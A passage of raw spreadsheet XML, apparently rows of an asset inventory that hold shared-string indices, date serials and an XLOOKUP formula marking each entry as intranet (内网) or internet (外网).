        <v>3690</v>
      </c>
      <c r="R5667" t="s">
        <v>3693</v>
      </c>
      <c r="S5667" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5667" s="29">
        <v>46004.0262962963</v>
      </c>
      <c r="U5667" t="s">
        <v>3864</v>
      </c>
      <c r="V5667" t="s">
        <v>3865</v>
      </c>
      <c r="W5667" t="s">
        <v>3866</v>
      </c>
    </row>
    <row r="5668" customHeight="1" spans="1:23">
      <c r="A5668">
        <v>5667</v>
      </c>
      <c r="B5668" t="s">
        <v>3867</v>
      </c>
      <c r="C5668" t="s">
        <v>3683</v>
      </c>
      <c r="D5668" t="s">
        <v>3684</v>
      </c>
      <c r="E5668" t="s">
        <v>3706</v>
      </c>
      <c r="F5668" t="s">
        <v>3686</v>
      </c>
      <c r="G5668" t="s">
        <v>3687</v>
      </c>
      <c r="H5668" t="s">
        <v>949</v>
      </c>
      <c r="I5668" t="s">
        <v>3688</v>
      </c>
      <c r="J5668" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5668" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5668" t="s">
        <v>3720</v>
      </c>
      <c r="M5668" t="s">
        <v>3721</v>
      </c>
      <c r="N5668" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5668,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5668" t="s">
        <v>3691</v>
      </c>
      <c r="P5668" t="s">
        <v>3692</v>
      </c>
      <c r="Q5668" t="s">
        <v>3690</v>
      </c>
      <c r="R5668" t="s">
        <v>3693</v>
      </c>
      <c r="S5668" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5668" s="29">
        <v>46004.0263078704</v>
      </c>
      <c r="U5668" t="s">
        <v>3770</v>
      </c>
      <c r="V5668" t="s">
        <v>3868</v>
      </c>
      <c r="W5668" t="s">
        <v>3869</v>
      </c>
    </row>
    <row r="5669" customHeight="1" spans="1:23">
      <c r="A5669">
        <v>5668</v>
      </c>
      <c r="B5669" t="s">
        <v>3779</v>
      </c>
      <c r="C5669" t="s">
        <v>3683</v>
      </c>
      <c r="D5669" t="s">
        <v>3684</v>
      </c>
      <c r="E5669" t="s">
        <v>3699</v>
      </c>
      <c r="F5669" t="s">
        <v>3686</v>
      </c>
      <c r="G5669" t="s">
        <v>3687</v>
      </c>
      <c r="H5669" t="s">
        <v>949</v>
      </c>
      <c r="I5669" t="s">
        <v>3688</v>
      </c>
      <c r="J5669" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5669" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5669" t="s">
        <v>3720</v>
      </c>
      <c r="M5669" t="s">
        <v>3721</v>
      </c>
      <c r="N5669" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5669,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5669" t="s">
        <v>3701</v>
      </c>
      <c r="P5669" t="s">
        <v>3692</v>
      </c>
      <c r="Q5669" t="s">
        <v>3690</v>
      </c>
      <c r="R5669" t="s">
        <v>3693</v>
      </c>
      <c r="S5669" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5669" s="29">
        <v>46004.0263078704</v>
      </c>
      <c r="U5669" t="s">
        <v>3770</v>
      </c>
      <c r="V5669" t="s">
        <v>3780</v>
      </c>
      <c r="W5669" t="s">
        <v>3781</v>
      </c>
    </row>
    <row r="5670" customHeight="1" spans="1:23">
      <c r="A5670">
        <v>5669</v>
      </c>
      <c r="B5670" t="s">
        <v>3782</v>
      </c>
      <c r="C5670" t="s">
        <v>3683</v>
      </c>
      <c r="D5670" t="s">
        <v>3684</v>
      </c>
      <c r="E5670" t="s">
        <v>3706</v>
      </c>
      <c r="F5670" t="s">
        <v>3686</v>
      </c>
      <c r="G5670" t="s">
        <v>3687</v>
      </c>
      <c r="H5670" t="s">
        <v>949</v>
      </c>
      <c r="I5670" t="s">
        <v>3688</v>
      </c>
      <c r="J5670" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5670" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5670" t="s">
        <v>3720</v>
      </c>
      <c r="M5670" t="s">
        <v>3721</v>
      </c>
      <c r="N5670" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5670,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5670" t="s">
        <v>3691</v>
      </c>
      <c r="P5670" t="s">
        <v>3692</v>
      </c>
      <c r="Q5670" t="s">
        <v>3690</v>
      </c>
      <c r="R5670" t="s">
        <v>3693</v>
      </c>
      <c r="S5670" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5670" s="29">
        <v>46004.0263078704</v>
      </c>
      <c r="U5670" t="s">
        <v>3783</v>
      </c>
      <c r="V5670" t="s">
        <v>3784</v>
      </c>
      <c r="W5670" t="s">
        <v>3785</v>
      </c>
    </row>
    <row r="5671" customHeight="1" spans="1:23">
      <c r="A5671">
        <v>5670</v>
      </c>
      <c r="B5671" t="s">
        <v>3872</v>
      </c>
      <c r="C5671" t="s">
        <v>3683</v>
      </c>
      <c r="D5671" t="s">
        <v>3684</v>
      </c>
      <c r="E5671" t="s">
        <v>3706</v>
      </c>
      <c r="F5671" t="s">
        <v>3686</v>
      </c>
      <c r="G5671" t="s">
        <v>3687</v>
      </c>
      <c r="H5671" t="s">
        <v>949</v>
      </c>
      <c r="I5671" t="s">
        <v>3688</v>
      </c>
      <c r="J5671" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5671" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5671" t="s">
        <v>3720</v>
      </c>
      <c r="M5671" t="s">
        <v>3721</v>
      </c>
      <c r="N5671" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5671,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5671" t="s">
        <v>3691</v>
      </c>
      <c r="P5671" t="s">
        <v>3692</v>
      </c>
      <c r="Q5671" t="s">
        <v>3690</v>
      </c>
      <c r="R5671" t="s">
        <v>3693</v>
      </c>
      <c r="S5671" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5671" s="29">
        <v>46004.0263078704</v>
      </c>
      <c r="U5671" t="s">
        <v>3873</v>
      </c>
      <c r="V5671" t="s">
        <v>3784</v>
      </c>
      <c r="W5671" t="s">
        <v>3781</v>
      </c>
    </row>
    <row r="5672" customHeight="1" spans="1:23">
      <c r="A5672">
        <v>5671</v>
      </c>
      <c r="B5672" t="s">
        <v>3914</v>
      </c>
      <c r="C5672" t="s">
        <v>3683</v>
      </c>
      <c r="D5672" t="s">
        <v>3684</v>
      </c>
      <c r="E5672" t="s">
        <v>3706</v>
      </c>
      <c r="F5672" t="s">
        <v>3686</v>
      </c>
      <c r="G5672" t="s">
        <v>3687</v>
      </c>
      <c r="H5672" t="s">
        <v>949</v>
      </c>
      <c r="I5672" t="s">
        <v>3688</v>
      </c>
      <c r="J5672" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5672" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5672" t="s">
        <v>3720</v>
      </c>
      <c r="M5672" t="s">
        <v>3721</v>
      </c>
      <c r="N5672" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5672,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5672" t="s">
        <v>3691</v>
      </c>
      <c r="P5672" t="s">
        <v>3692</v>
      </c>
      <c r="Q5672" t="s">
        <v>3690</v>
      </c>
      <c r="R5672" t="s">
        <v>3693</v>
      </c>
      <c r="S5672" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5672" s="29">
        <v>46004.0263078704</v>
      </c>
      <c r="U5672" t="s">
        <v>3824</v>
      </c>
      <c r="V5672" t="s">
        <v>3825</v>
      </c>
      <c r="W5672" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5673" customHeight="1" spans="1:23">
      <c r="A5673">
        <v>5672</v>
      </c>
      <c r="B5673" t="s">
        <v>3882</v>
      </c>
      <c r="C5673" t="s">
        <v>3683</v>
      </c>
      <c r="D5673" t="s">
        <v>3684</v>
      </c>
      <c r="E5673" t="s">
        <v>3685</v>
      </c>
      <c r="F5673" t="s">
        <v>3686</v>
      </c>
      <c r="G5673" t="s">
        <v>3687</v>
      </c>
      <c r="H5673" t="s">
        <v>949</v>
      </c>
      <c r="I5673" t="s">
        <v>3688</v>
      </c>
      <c r="J5673" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5673" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5673" t="s">
        <v>3720</v>
      </c>
      <c r="M5673" t="s">
        <v>3721</v>
      </c>
      <c r="N5673" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5673,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5673" t="s">
        <v>3691</v>
      </c>
      <c r="P5673" t="s">
        <v>3692</v>
      </c>
      <c r="Q5673" t="s">
        <v>3690</v>
      </c>
      <c r="R5673" t="s">
        <v>3693</v>
      </c>
      <c r="S5673" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5673" s="29">
        <v>46004.0263194444</v>
      </c>
      <c r="U5673" t="s">
        <v>3824</v>
      </c>
      <c r="V5673" t="s">
        <v>3825</v>
      </c>
      <c r="W5673" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5674" customHeight="1" spans="1:23">
      <c r="A5674">
        <v>5673</v>
      </c>
      <c r="B5674" t="s">
        <v>3916</v>
      </c>
      <c r="C5674" t="s">
        <v>3683</v>
      </c>
      <c r="D5674" t="s">
        <v>3684</v>
      </c>
      <c r="E5674" t="s">
        <v>3706</v>
      </c>
      <c r="F5674" t="s">
        <v>3686</v>
      </c>
      <c r="G5674" t="s">
        <v>3687</v>
      </c>
      <c r="H5674" t="s">
        <v>949</v>
      </c>
      <c r="I5674" t="s">
        <v>3688</v>
      </c>
      <c r="J5674" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5674" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5674" t="s">
        <v>3720</v>
      </c>
      <c r="M5674" t="s">
        <v>3721</v>
      </c>
      <c r="N5674" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5674,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5674" t="s">
        <v>3691</v>
      </c>
      <c r="P5674" t="s">
        <v>3692</v>
      </c>
      <c r="Q5674" t="s">
        <v>3690</v>
      </c>
      <c r="R5674" t="s">
        <v>3693</v>
      </c>
      <c r="S5674" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5674" s="29">
        <v>46004.0263194444</v>
      </c>
      <c r="U5674" t="s">
        <v>3824</v>
      </c>
      <c r="V5674" t="s">
        <v>3825</v>
      </c>
      <c r="W5674" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5675" customHeight="1" spans="1:23">
      <c r="A5675">
        <v>5674</v>
      </c>
      <c r="B5675" t="s">
        <v>3908</v>
      </c>
      <c r="C5675" t="s">
        <v>3683</v>
      </c>
      <c r="D5675" t="s">
        <v>3684</v>
      </c>
      <c r="E5675" t="s">
        <v>3706</v>
      </c>
      <c r="F5675" t="s">
        <v>3686</v>
      </c>
      <c r="G5675" t="s">
        <v>3687</v>
      </c>
      <c r="H5675" t="s">
        <v>949</v>
      </c>
      <c r="I5675" t="s">
        <v>3688</v>
      </c>
      <c r="J5675" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5675" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5675" t="s">
        <v>3720</v>
      </c>
      <c r="M5675" t="s">
        <v>3721</v>
      </c>
      <c r="N5675" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5675,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5675" t="s">
        <v>3691</v>
      </c>
      <c r="P5675" t="s">
        <v>3692</v>
      </c>
      <c r="Q5675" t="s">
        <v>3690</v>
      </c>
      <c r="R5675" t="s">
        <v>3693</v>
      </c>
      <c r="S5675" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5675" s="29">
        <v>46004.0262962963</v>
      </c>
      <c r="U5675" t="s">
        <v>3787</v>
      </c>
      <c r="V5675" t="s">
        <v>3825</v>
      </c>
      <c r="W5675" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5676" customHeight="1" spans="1:23">
      <c r="A5676">
        <v>5675</v>
      </c>
      <c r="B5676" t="s">
        <v>3880</v>
      </c>
      <c r="C5676" t="s">
        <v>3683</v>
      </c>
      <c r="D5676" t="s">
        <v>3684</v>
      </c>
      <c r="E5676" t="s">
        <v>3706</v>
      </c>
      <c r="F5676" t="s">
        <v>3686</v>
      </c>
      <c r="G5676" t="s">
        <v>3687</v>
      </c>
      <c r="H5676" t="s">
        <v>949</v>
      </c>
      <c r="I5676" t="s">
        <v>3688</v>
      </c>
      <c r="J5676" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5676" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5676" t="s">
        <v>3720</v>
      </c>
      <c r="M5676" t="s">
        <v>3721</v>
      </c>
      <c r="N5676" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5676,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5676" t="s">
        <v>3691</v>
      </c>
      <c r="P5676" t="s">
        <v>3692</v>
      </c>
      <c r="Q5676" t="s">
        <v>3690</v>
      </c>
      <c r="R5676" t="s">
        <v>3693</v>
      </c>
      <c r="S5676" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5676" s="29">
        <v>46004.0262962963</v>
      </c>
      <c r="U5676" t="s">
        <v>3787</v>
      </c>
      <c r="V5676" t="s">
        <v>3825</v>
      </c>
      <c r="W5676" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5677" customHeight="1" spans="1:23">
      <c r="A5677">
        <v>5676</v>
      </c>
      <c r="B5677" t="s">
        <v>3911</v>
      </c>
      <c r="C5677" t="s">
        <v>3683</v>
      </c>
      <c r="D5677" t="s">
        <v>3684</v>
      </c>
      <c r="E5677" t="s">
        <v>3706</v>
      </c>
      <c r="F5677" t="s">
        <v>3686</v>
      </c>
      <c r="G5677" t="s">
        <v>3687</v>
      </c>
      <c r="H5677" t="s">
        <v>949</v>
      </c>
      <c r="I5677" t="s">
        <v>3688</v>
      </c>
      <c r="J5677" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5677" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5677" t="s">
        <v>3720</v>
      </c>
      <c r="M5677" t="s">
        <v>3721</v>
      </c>
      <c r="N5677" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5677,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5677" t="s">
        <v>3691</v>
      </c>
      <c r="P5677" t="s">
        <v>3692</v>
      </c>
      <c r="Q5677" t="s">
        <v>3690</v>
      </c>
      <c r="R5677" t="s">
        <v>3693</v>
      </c>
      <c r="S5677" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5677" s="29">
        <v>46004.0263078704</v>
      </c>
      <c r="U5677" t="s">
        <v>3912</v>
      </c>
      <c r="V5677" t="s">
        <v>3825</v>
      </c>
      <c r="W5677" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5678" customHeight="1" spans="1:23">
      <c r="A5678">
        <v>5677</v>
      </c>
      <c r="B5678" t="s">
        <v>3915</v>
      </c>
      <c r="C5678" t="s">
        <v>3683</v>
      </c>
      <c r="D5678" t="s">
        <v>3684</v>
      </c>
      <c r="E5678" t="s">
        <v>3706</v>
      </c>
      <c r="F5678" t="s">
        <v>3686</v>
      </c>
      <c r="G5678" t="s">
        <v>3687</v>
      </c>
      <c r="H5678" t="s">
        <v>949</v>
      </c>
      <c r="I5678" t="s">
        <v>3688</v>
      </c>
      <c r="J5678" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5678" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5678" t="s">
        <v>3720</v>
      </c>
      <c r="M5678" t="s">
        <v>3721</v>
      </c>
      <c r="N5678" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5678,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5678" t="s">
        <v>3691</v>
      </c>
      <c r="P5678" t="s">
        <v>3692</v>
      </c>
      <c r="Q5678" t="s">
        <v>3690</v>
      </c>
      <c r="R5678" t="s">
        <v>3693</v>
      </c>
      <c r="S5678" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5678" s="29">
        <v>46004.0263310185</v>
      </c>
      <c r="U5678" t="s">
        <v>3824</v>
      </c>
      <c r="V5678" t="s">
        <v>3825</v>
      </c>
      <c r="W5678" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="5679" customHeight="1" spans="1:23">
      <c r="A5679">
        <v>5678</v>
      </c>
      <c r="B5679" t="s">
        <v>3883</v>
      </c>
      <c r="C5679" t="s">
        <v>3683</v>
      </c>
      <c r="D5679" t="s">
        <v>3684</v>
      </c>
      <c r="E5679" t="s">
        <v>3706</v>
      </c>
      <c r="F5679" t="s">
        <v>3686</v>
      </c>
      <c r="G5679" t="s">
        <v>3687</v>
      </c>
      <c r="H5679" t="s">
        <v>949</v>
      </c>
      <c r="I5679" t="s">
        <v>3688</v>
      </c>
      <c r="J5679" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5679" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5679" t="s">
        <v>3720</v>
      </c>
      <c r="M5679" t="s">
        <v>3721</v>
      </c>
      <c r="N5679" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5679,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5679" t="s">
        <v>3691</v>
      </c>
      <c r="P5679" t="s">
        <v>3692</v>
      </c>
      <c r="Q5679" t="s">
        <v>3690</v>
      </c>
      <c r="R5679" t="s">
        <v>3693</v>
      </c>
      <c r="S5679" s="29">
        <v>45759.9821990741</v>
      </c>
      <c r="T5679" s="29">
        <v>46004.0263310185</v>
      </c>
      <c r="U5679" t="s">
        <v>3787</v>
      </c>
      <c r="V5679" t="s">
        <v>3884</v>
      </c>
      <c r="W5679" t="s">
        <v>3829</v>
      </c>
    </row>
    <row r="5680" customHeight="1" spans="1:23">
      <c r="A5680">
        <v>5679</v>
      </c>
      <c r="B5680" t="s">
        <v>3888</v>
      </c>
      <c r="C5680" t="s">
        <v>3683</v>
      </c>
      <c r="D5680" t="s">
        <v>3684</v>
      </c>
      <c r="E5680" t="s">
        <v>3699</v>
      </c>
      <c r="F5680" t="s">
        <v>3686</v>
      </c>
      <c r="G5680" t="s">
        <v>3687</v>
      </c>
      <c r="H5680" t="s">
        <v>949</v>
      </c>
      <c r="I5680" t="s">
        <v>3688</v>
      </c>
      <c r="J5680" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5680" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5680" t="s">
        <v>3720</v>
      </c>
      <c r="M5680" t="s">
        <v>3721</v>
      </c>
      <c r="N5680" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5680,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5680" t="s">
        <v>3701</v>
      </c>
      <c r="P5680" t="s">
        <v>3692</v>
      </c>
      <c r="Q5680" t="s">
        <v>3690</v>
      </c>
      <c r="R5680" t="s">
        <v>3693</v>
      </c>
      <c r="S5680" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5680" s="29">
        <v>46004.0263310185</v>
      </c>
      <c r="U5680" t="s">
        <v>3795</v>
      </c>
      <c r="V5680" t="s">
        <v>3889</v>
      </c>
      <c r="W5680" t="s">
        <v>3890</v>
      </c>
    </row>
    <row r="5681" customHeight="1" spans="1:23">
      <c r="A5681">
        <v>5680</v>
      </c>
      <c r="B5681" t="s">
        <v>3925</v>
      </c>
      <c r="C5681" t="s">
        <v>3683</v>
      </c>
      <c r="D5681" t="s">
        <v>3684</v>
      </c>
      <c r="E5681" t="s">
        <v>3685</v>
      </c>
      <c r="F5681" t="s">
        <v>3686</v>
      </c>
      <c r="G5681" t="s">
        <v>3687</v>
      </c>
      <c r="H5681" t="s">
        <v>949</v>
      </c>
      <c r="I5681" t="s">
        <v>3688</v>
      </c>
      <c r="J5681" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5681" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5681" t="s">
        <v>3720</v>
      </c>
      <c r="M5681" t="s">
        <v>3721</v>
      </c>
      <c r="N5681" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5681,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5681" t="s">
        <v>3691</v>
      </c>
      <c r="P5681" t="s">
        <v>3692</v>
      </c>
      <c r="Q5681" t="s">
        <v>3690</v>
      </c>
      <c r="R5681" t="s">
        <v>3693</v>
      </c>
      <c r="S5681" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5681" s="29">
        <v>46004.0263425926</v>
      </c>
      <c r="U5681" t="s">
        <v>3787</v>
      </c>
      <c r="V5681" t="s">
        <v>3902</v>
      </c>
    </row>
    <row r="5682" customHeight="1" spans="1:23">
      <c r="A5682">
        <v>5681</v>
      </c>
      <c r="B5682" t="s">
        <v>3891</v>
      </c>
      <c r="C5682" t="s">
        <v>3683</v>
      </c>
      <c r="D5682" t="s">
        <v>3684</v>
      </c>
      <c r="E5682" t="s">
        <v>3699</v>
      </c>
      <c r="F5682" t="s">
        <v>3686</v>
      </c>
      <c r="G5682" t="s">
        <v>3687</v>
      </c>
      <c r="H5682" t="s">
        <v>949</v>
      </c>
      <c r="I5682" t="s">
        <v>3688</v>
      </c>
      <c r="J5682" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5682" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5682" t="s">
        <v>3720</v>
      </c>
      <c r="M5682" t="s">
        <v>3721</v>
      </c>
      <c r="N5682" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5682,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5682" t="s">
        <v>3701</v>
      </c>
      <c r="P5682" t="s">
        <v>3692</v>
      </c>
      <c r="Q5682" t="s">
        <v>3690</v>
      </c>
      <c r="R5682" t="s">
        <v>3693</v>
      </c>
      <c r="S5682" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5682" s="29">
        <v>46004.0263425926</v>
      </c>
      <c r="U5682" t="s">
        <v>3787</v>
      </c>
      <c r="V5682" t="s">
        <v>3892</v>
      </c>
      <c r="W5682" t="s">
        <v>3893</v>
      </c>
    </row>
    <row r="5683" customHeight="1" spans="1:23">
      <c r="A5683">
        <v>5682</v>
      </c>
      <c r="B5683" t="s">
        <v>3897</v>
      </c>
      <c r="C5683" t="s">
        <v>3683</v>
      </c>
      <c r="D5683" t="s">
        <v>3684</v>
      </c>
      <c r="E5683" t="s">
        <v>3699</v>
      </c>
      <c r="F5683" t="s">
        <v>3686</v>
      </c>
      <c r="G5683" t="s">
        <v>3687</v>
      </c>
      <c r="H5683" t="s">
        <v>949</v>
      </c>
      <c r="I5683" t="s">
        <v>3688</v>
      </c>
      <c r="J5683" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5683" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5683" t="s">
        <v>3720</v>
      </c>
      <c r="M5683" t="s">
        <v>3721</v>
      </c>
      <c r="N5683" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5683,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5683" t="s">
        <v>3701</v>
      </c>
      <c r="P5683" t="s">
        <v>3692</v>
      </c>
      <c r="Q5683" t="s">
        <v>3690</v>
      </c>
      <c r="R5683" t="s">
        <v>3693</v>
      </c>
      <c r="S5683" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5683" s="29">
        <v>46004.0263425926</v>
      </c>
      <c r="U5683" t="s">
        <v>3898</v>
      </c>
      <c r="V5683" t="s">
        <v>3899</v>
      </c>
      <c r="W5683" t="s">
        <v>3900</v>
      </c>
    </row>
    <row r="5684" customHeight="1" spans="1:23">
      <c r="A5684">
        <v>5683</v>
      </c>
      <c r="B5684" t="s">
        <v>3933</v>
      </c>
      <c r="C5684" t="s">
        <v>3683</v>
      </c>
      <c r="D5684" t="s">
        <v>3684</v>
      </c>
      <c r="E5684" t="s">
        <v>3699</v>
      </c>
      <c r="F5684" t="s">
        <v>3686</v>
      </c>
      <c r="G5684" t="s">
        <v>3687</v>
      </c>
      <c r="H5684" t="s">
        <v>949</v>
      </c>
      <c r="I5684" t="s">
        <v>3688</v>
      </c>
      <c r="J5684" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5684" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5684" t="s">
        <v>3720</v>
      </c>
      <c r="M5684" t="s">
        <v>3721</v>
      </c>
      <c r="N5684" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5684,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5684" t="s">
        <v>3701</v>
      </c>
      <c r="P5684" t="s">
        <v>3692</v>
      </c>
      <c r="Q5684" t="s">
        <v>3690</v>
      </c>
      <c r="R5684" t="s">
        <v>3693</v>
      </c>
      <c r="S5684" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5684" s="29">
        <v>46004.0263541667</v>
      </c>
      <c r="U5684" t="s">
        <v>3934</v>
      </c>
      <c r="V5684" t="s">
        <v>3935</v>
      </c>
      <c r="W5684" t="s">
        <v>3887</v>
      </c>
    </row>
    <row r="5685" customHeight="1" spans="1:23">
      <c r="A5685">
        <v>5684</v>
      </c>
      <c r="B5685" t="s">
        <v>3936</v>
      </c>
      <c r="C5685" t="s">
        <v>3683</v>
      </c>
      <c r="D5685" t="s">
        <v>3684</v>
      </c>
      <c r="E5685" t="s">
        <v>3706</v>
      </c>
      <c r="F5685" t="s">
        <v>3686</v>
      </c>
      <c r="G5685" t="s">
        <v>3687</v>
      </c>
      <c r="H5685" t="s">
        <v>949</v>
      </c>
      <c r="I5685" t="s">
        <v>3688</v>
      </c>
      <c r="J5685" s="28" t="s">
        <v>950</v>
      </c>
      <c r="K5685" s="28" t="s">
        <v>950</v>
      </c>
      <c r="L5685" t="s">
        <v>3720</v>
      </c>
      <c r="M5685" t="s">
        <v>3721</v>
      </c>
      <c r="N5685" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5685,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>内网</v>
      </c>
      <c r="O5685" t="s">
        <v>3691</v>
      </c>
      <c r="P5685" t="s">
        <v>3692</v>
      </c>
      <c r="Q5685" t="s">
        <v>3690</v>
      </c>
      <c r="R5685" t="s">
        <v>3693</v>
      </c>
      <c r="S5685" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5685" s="29">
        <v>46004.0263541667</v>
      </c>
      <c r="U5685" t="s">
        <v>3795</v>
      </c>
      <c r="V5685" t="s">
        <v>3937</v>
      </c>
    </row>
    <row r="5686" customHeight="1" spans="1:23">
      <c r="A5686">
        <v>5685</v>
      </c>
      <c r="B5686" t="s">
        <v>5679</v>
      </c>
      <c r="C5686" t="s">
        <v>3698</v>
      </c>
      <c r="D5686" t="s">
        <v>3684</v>
      </c>
      <c r="E5686" t="s">
        <v>3699</v>
      </c>
      <c r="F5686" t="s">
        <v>400</v>
      </c>
      <c r="G5686" t="s">
        <v>5680</v>
      </c>
      <c r="H5686" t="s">
        <v>2481</v>
      </c>
      <c r="I5686" t="s">
        <v>3688</v>
      </c>
      <c r="J5686" s="28" t="s">
        <v>2482</v>
      </c>
      <c r="K5686" s="28" t="s">
        <v>2482</v>
      </c>
      <c r="L5686" t="s">
        <v>3700</v>
      </c>
      <c r="M5686" t="s">
        <v>3690</v>
      </c>
      <c r="N5686" s="31" t="str">
        <f>_xlfn.XLOOKUP(K5686,资产表!C:C,资产表!AG:AG,“”)</f>
        <v>外网</v>
      </c>
      <c r="O5686" t="s">
        <v>4348</v>
      </c>
      <c r="P5686" t="s">
        <v>4286</v>
      </c>
      <c r="Q5686" t="s">
        <v>3690</v>
      </c>
      <c r="R5686" t="s">
        <v>3693</v>
      </c>
      <c r="S5686" s="29">
        <v>45759.9822106482</v>
      </c>
      <c r="T5686" s="29">
        <v>46004.0253935185</v>
      </c>
      <c r="U5686" t="s">
        <v>5681</v>
      </c>
      <c r="V5686" t="s">
        <v>5682</v>
      </c>
      <c r="W5686" t="s">
        <v>5683</v>
      </c>
    </row>
    <row r="5687" customHeight="1" spans="1:23">
      <c r="A5687">
        <v>5686</v>
      </c>
      <c r="B5687" t="s">
        <v>3705</v>
      </c>
      <c r="C5687" t="s">
        <v>3698</v>
      </c>
      <c r="D5687" t="s">
        <v>3684</v>
      </c>
      <c r="E5687" t="s">
        <v>3706</v>
      </c>
      <c r="F5687" t="s">
        <v>3686</v>
      </c>
      <c r="G5687" t="s">
        <v>3687</v>
      </c>
      <c r="H5687" t="s">
        <v>2488</v>
      </c>
      <c r="I5687" t="s">
        <v>3688</v>
      </c>
      <c r="J5687" s="28" t="s">
        <v>2489</v>
      </c>
      <c r="K5687" s="28" t="s">
        <v>2489</v>
      </c>
      <c r="L5687" t="s">
        <v>3700</v>
      </c>
      <c r="M5687" t="s">
        <v>3690</v>
      </c>
      <c r="N5687" s="31" t="str">
